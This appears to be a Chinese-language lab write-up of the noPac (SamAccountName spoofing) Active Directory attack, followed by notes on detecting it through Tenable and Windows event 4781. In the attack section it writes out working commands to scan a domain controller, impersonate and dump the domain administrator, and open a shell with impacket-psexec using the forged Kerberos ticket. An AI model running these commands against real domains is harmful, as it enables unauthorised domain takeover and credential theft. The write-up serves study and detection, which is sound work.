SamAccount模拟

SamAccount模拟

Adil 0 2024-02-20

一、简介

  • 此漏洞通过将SamAccountName计算机帐户更改为域控制器帐户,从而域内认证时进行身份伪造,进一步利用伪造的 DC 身份取得域内的高权限,以此获取到任意域内成员的身份。

  • 默认情况下,经过身份验证的用户最多可以将十台计算机添加到域中

  • 利用项目:https://github.com/Ridter/noPac

二、攻击利用

2.1 扫描验证

  • python3 scanner.py tech.com/adil:@123123qwe -dc-ip 192.168.30.149 -use-ldap

image-20240217173209608

2.2 取得SHELL

  • 基于SMBexec 命令有限,为受限状态的 SHELL,不推荐使用。

image-20240217175306681

2.3 票据利用

  • 获取机器票据
    • python3 noPac.py tech.com/adil:@123123qwe -dc-ip 192.168.30.149 -dc-host DC --impersonate privilege -use-ldap -dump -just-dc-user tech.com/administrator

image-20240217180758755

  • 修改 hosts 文件,对应 DC

image-20240217175645304

  • 使用票据

  • KRB5CCNAME=privilege_DC.tech.com.ccache impacket-psexec -k -no-pass dc.tech.com

image-20240217180838224

三、攻击检测

3.1 产品检测

  • 基于 Tenable.AD,现名:Tenable Identity Exposure

image-20240217183228436

3.2 SOC检测

  • event溯源:4781

  • 攻击详情

    • 补充说明:该攻击基于

image-20240219141046046

  • 事件溯源
    • 说明:进行该攻击时将会利用域内普通账户的权限创建一个机器账户,随后将机器账户的名字改为 DC 以此来进行欺骗,从而冒用 DC 的身份对想要模拟的用户身份进行发放票据,攻击者使用该票据就可以使用目标账户的权限了。
    • 该攻击类似于 shadow credential 的利用

微信截图_20240219140421